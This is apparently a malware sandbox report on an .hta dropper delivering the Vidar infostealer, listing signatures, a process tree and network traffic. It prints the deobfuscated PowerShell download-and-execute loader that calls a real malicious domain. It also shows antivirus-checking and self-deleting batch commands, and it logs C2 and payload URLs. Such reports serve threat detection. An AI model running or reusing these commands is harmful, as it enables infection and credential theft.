Resubmissions

23/12/2024, 13:11 UTC

241223-qe4yfszrgj 10

23/12/2024, 12:31 UTC

241223-pqanbazjcs 10

Analysis

  • max time kernel
    93s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23/12/2024, 13:11 UTC

General

  • Target

    .hta

  • Size

    722B

  • MD5

    4f2067f591d1db46908f42c461b43bc8

  • SHA1

    dbb6c2be0345648645105f5f8646662e319a01ba

  • SHA256

    edebb1c19818a5dc2f09d95f6852c328e9427bc460c3517b543cdf101fba7d84

  • SHA512

    5fde4eea4445de8ac73e510c43475b025d12d8f4e9c71e230d7b99a49efc8c6fa381bcda09295c26afb294bd67cf0a63c20f538dd3b66b702ca9f1ac75bf1c9a

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
    &{$u = "https://polovoiinspektor.shop/secure/login.txt", $c = (invoke-webrequest -uri $u -usebasicparsing).content, $b = [scriptblock]::create($c), &$b}
  • URLs
    exe.dropper
    https://polovoiinspektor.shop/secure/login.txt

Signatures

  • Detect Vidar Stealer 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4528
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& {$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9wb2xvdm9paW5zcGVrdG9yLnNob3Avc2VjdXJlL2xvZ2luLnR4dA=='));$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content;$B=[scriptblock]::Create($C);&$B}"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\obnnmmot\obnnmmot.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB016.tmp" "c:\Users\Admin\AppData\Local\Temp\obnnmmot\CSC8DF14D57E40E4CD59F40DFE961FA71E.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2780
      • C:\Users\Admin\AppData\Local\Temp\drtg4eyr.uj3.exe
        "C:\Users\Admin\AppData\Local\Temp\drtg4eyr.uj3.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1656
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3132
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1100
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "opssvc wrsa"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3988
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4088
          • C:\Windows\SysWOW64\findstr.exe
            findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4700
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c md 623615
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4280
          • C:\Windows\SysWOW64\extrac32.exe
            extrac32 /Y /E Distances
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4064
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V "Duck" Ix
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2484
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3248
          • C:\Users\Admin\AppData\Local\Temp\623615\Wb.com
            Wb.com f
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:1392
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\KNG4E3OZMOZU" & exit
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4032
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 10
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:4236
          • C:\Windows\SysWOW64\choice.exe
            choice /d y /t 5
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4336

Network

  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    17.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    polovoiinspektor.shop
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    polovoiinspektor.shop
    IN A
    Response
    polovoiinspektor.shop
    IN A
    185.121.235.167
  • flag-us
    GET
    https://polovoiinspektor.shop/secure/login.txt
    powershell.exe
    Remote address:
    185.121.235.167:443
    Request
    GET /secure/login.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: polovoiinspektor.shop
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.26.2
    Date: Mon, 23 Dec 2024 13:11:44 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 1264
    Last-Modified: Mon, 23 Dec 2024 12:47:49 GMT
    Connection: keep-alive
    ETag: "67695bf5-4f0"
    Accept-Ranges: bytes
  • flag-us
    DNS
    raw.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • flag-us
    GET
    https://raw.githubusercontent.com/MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe
    powershell.exe
    Remote address:
    185.199.109.133:443
    Request
    GET /MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 1111393
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "6034a3e23f5d37f82b6b551e606b7b7b2df095f09fa1b3f56cc84a496c13bbca"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 0AB4:1B4DCA:69545B:8C8DE5:67696097
    Accept-Ranges: bytes
    Date: Mon, 23 Dec 2024 13:11:44 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lcy-eglc8600022-LCY
    X-Cache: HIT
    X-Cache-Hits: 0
    X-Timer: S1734959505.673626,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 699da9a7a7847778c0d08b743061d229c7486d18
    Expires: Mon, 23 Dec 2024 13:16:44 GMT
    Source-Age: 249
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    167.235.121.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.235.121.185.in-addr.arpa
    IN PTR
    Response
    167.235.121.185.in-addr.arpa
    IN PTR
    v200070.hosted-by-vdsina.com
  • flag-us
    DNS
    133.109.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.109.199.185.in-addr.arpa
    IN PTR
    Response
    133.109.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-109-133.github.com
  • flag-us
    DNS
    ifconfig.me
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    ifconfig.me
    IN A
    Response
    ifconfig.me
    IN A
    34.160.111.145
  • flag-us
    GET
    https://ifconfig.me/ip
    powershell.exe
    Remote address:
    34.160.111.145:443
    Request
    GET /ip HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: ifconfig.me
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    date: Mon, 23 Dec 2024 13:11:46 GMT
    content-type: text/plain
    Content-Length: 14
    access-control-allow-origin: *
    via: 1.1 google
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    145.111.160.34.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    145.111.160.34.in-addr.arpa
    IN PTR
    Response
    145.111.160.34.in-addr.arpa
    IN PTR
    145.111.160.34.bc.googleusercontent.com
  • flag-us
    DNS
    saaadnesss.shop
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    saaadnesss.shop
    IN A
    Response
    saaadnesss.shop
    IN A
    185.121.235.167
  • flag-us
    POST
    https://saaadnesss.shop/connect
    powershell.exe
    Remote address:
    185.121.235.167:443
    Request
    POST /connect HTTP/1.1
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
    Host: saaadnesss.shop
    Content-Length: 33
    Connection: Keep-Alive
    Response
    HTTP/1.1 200
    Server: nginx/1.26.2
    Date: Mon, 23 Dec 2024 13:11:48 GMT
    Content-Type: application/json
    Content-Length: 20
    Connection: keep-alive
    vary: Origin
  • flag-us
    DNS
    jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx
    Wb.com
    Remote address:
    8.8.8.8:53
    Request
    jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx
    IN A
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    t.me
    Wb.com
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-nl
    GET
    https://t.me/k04ael
    Wb.com
    Remote address:
    149.154.167.99:443
    Request
    GET /k04ael HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 23 Dec 2024 13:12:04 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12298
    Connection: keep-alive
    Set-Cookie: stel_ssid=cf4f49f67854273cc9_9565173306734016076; expires=Tue, 24 Dec 2024 13:12:04 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • flag-us
    DNS
    bijutr.shop
    Wb.com
    Remote address:
    8.8.8.8:53
    Request
    bijutr.shop
    IN A
    Response
    bijutr.shop
    IN A
    188.245.216.205
  • flag-de
    GET
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    99.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HLX4EUSR1N7QQIMGVASR
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----9HVSRQ90HDJM7QIW4OHD
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    e5.o.lencr.org
    Wb.com
    Remote address:
    8.8.8.8:53
    Request
    e5.o.lencr.org
    IN A
    Response
    e5.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    92.123.77.34
    a1887.dscq.akamai.net
    IN A
    92.123.77.67
  • flag-nl
    GET
    http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D
    Wb.com
    Remote address:
    92.123.77.34:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: e5.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 345
    ETag: "925107482F0B720C871FA7FEB51669ACDE93F83B32EB860D03676CBAF4B83E3B"
    Last-Modified: Mon, 23 Dec 2024 08:54:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=6141
    Expires: Mon, 23 Dec 2024 14:54:27 GMT
    Date: Mon, 23 Dec 2024 13:12:06 GMT
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----H47YMGLX4OZM7YC2NOZM
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    205.216.245.188.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.216.245.188.in-addr.arpa
    IN PTR
    Response
    205.216.245.188.in-addr.arpa
    IN PTR
    static.205.216.245.188.clients.your-server.de
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
    Response
    168.245.100.95.in-addr.arpa
    IN PTR
    a95-100-245-168.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    34.77.123.92.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    34.77.123.92.in-addr.arpa
    IN PTR
    Response
    34.77.123.92.in-addr.arpa
    IN PTR
    a92-123-77-34.deploy.static.akamaitechnologies.com
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----US0HDTJW4EU3E37900ZU
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 300
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----OP8QIECJ5XBIM7Y5XBAI
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----US0HDTJW4EU3E37900ZU
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://bijutr.shop/
    Wb.com
    Remote address:
    188.245.216.205:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----S26PZCJEC2V37YCBAIMG
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: bijutr.shop
    Content-Length: 299
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 13:12:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    72.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    72.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 185.121.235.167:443
    https://polovoiinspektor.shop/secure/login.txt
    tls, http
    powershell.exe
    843 B
    4.3kB
    8
    6

    HTTP Request

    GET https://polovoiinspektor.shop/secure/login.txt

    HTTP Response

    200
  • 185.199.109.133:443
    https://raw.githubusercontent.com/MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe
    tls, http
    powershell.exe
    21.7kB
    1.2MB
    455
    838

    HTTP Request

    GET https://raw.githubusercontent.com/MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe

    HTTP Response

    200
  • 34.160.111.145:443
    https://ifconfig.me/ip
    tls, http
    powershell.exe
    809 B
    4.0kB
    8
    8

    HTTP Request

    GET https://ifconfig.me/ip

    HTTP Response

    200
  • 185.121.235.167:443
    https://saaadnesss.shop/connect
    tls, http
    powershell.exe
    977 B
    3.1kB
    9
    6

    HTTP Request

    POST https://saaadnesss.shop/connect

    HTTP Response

    200
  • 149.154.167.99:443
    https://t.me/k04ael
    tls, http
    Wb.com
    1.5kB
    19.4kB
    24
    20

    HTTP Request

    GET https://t.me/k04ael

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.0kB
    3.0kB
    11
    8

    HTTP Request

    GET https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.4kB
    565 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.5kB
    598 B
    9
    7

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 92.123.77.34:80
    http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D
    http
    Wb.com
    467 B
    862 B
    5
    3

    HTTP Request

    GET http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.5kB
    558 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.5kB
    558 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.5kB
    558 B
    9
    6

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.4kB
    518 B
    8
    5

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 188.245.216.205:443
    https://bijutr.shop/
    tls, http
    Wb.com
    1.4kB
    518 B
    8
    5

    HTTP Request

    POST https://bijutr.shop/

    HTTP Response

    200
  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    17.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    17.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    polovoiinspektor.shop
    dns
    powershell.exe
    67 B
    83 B
    1
    1

    DNS Request

    polovoiinspektor.shop

    DNS Response

    185.121.235.167

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    powershell.exe
    71 B
    135 B
    1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.109.133
    185.199.108.133
    185.199.111.133
    185.199.110.133

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    167.235.121.185.in-addr.arpa
    dns
    74 B
    116 B
    1
    1

    DNS Request

    167.235.121.185.in-addr.arpa

  • 8.8.8.8:53
    133.109.199.185.in-addr.arpa
    dns
    74 B
    118 B
    1
    1

    DNS Request

    133.109.199.185.in-addr.arpa

  • 8.8.8.8:53
    ifconfig.me
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    ifconfig.me

    DNS Response

    34.160.111.145

  • 8.8.8.8:53
    145.111.160.34.in-addr.arpa
    dns
    73 B
    126 B
    1
    1

    DNS Request

    145.111.160.34.in-addr.arpa

  • 8.8.8.8:53
    saaadnesss.shop
    dns
    powershell.exe
    61 B
    77 B
    1
    1

    DNS Request

    saaadnesss.shop

    DNS Response

    185.121.235.167

  • 8.8.8.8:53
    jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx
    dns
    Wb.com
    95 B
    170 B
    1
    1

    DNS Request

    jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    t.me
    dns
    Wb.com
    50 B
    66 B
    1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    bijutr.shop
    dns
    Wb.com
    57 B
    73 B
    1
    1

    DNS Request

    bijutr.shop

    DNS Response

    188.245.216.205

  • 8.8.8.8:53
    99.167.154.149.in-addr.arpa
    dns
    73 B
    166 B
    1
    1

    DNS Request

    99.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    e5.o.lencr.org
    dns
    Wb.com
    60 B
    159 B
    1
    1

    DNS Request

    e5.o.lencr.org

    DNS Response

    92.123.77.34
    92.123.77.67

  • 8.8.8.8:53
    205.216.245.188.in-addr.arpa
    dns
    74 B
    133 B
    1
    1

    DNS Request

    205.216.245.188.in-addr.arpa

  • 8.8.8.8:53
    168.245.100.95.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    168.245.100.95.in-addr.arpa

  • 8.8.8.8:53
    34.77.123.92.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    34.77.123.92.in-addr.arpa
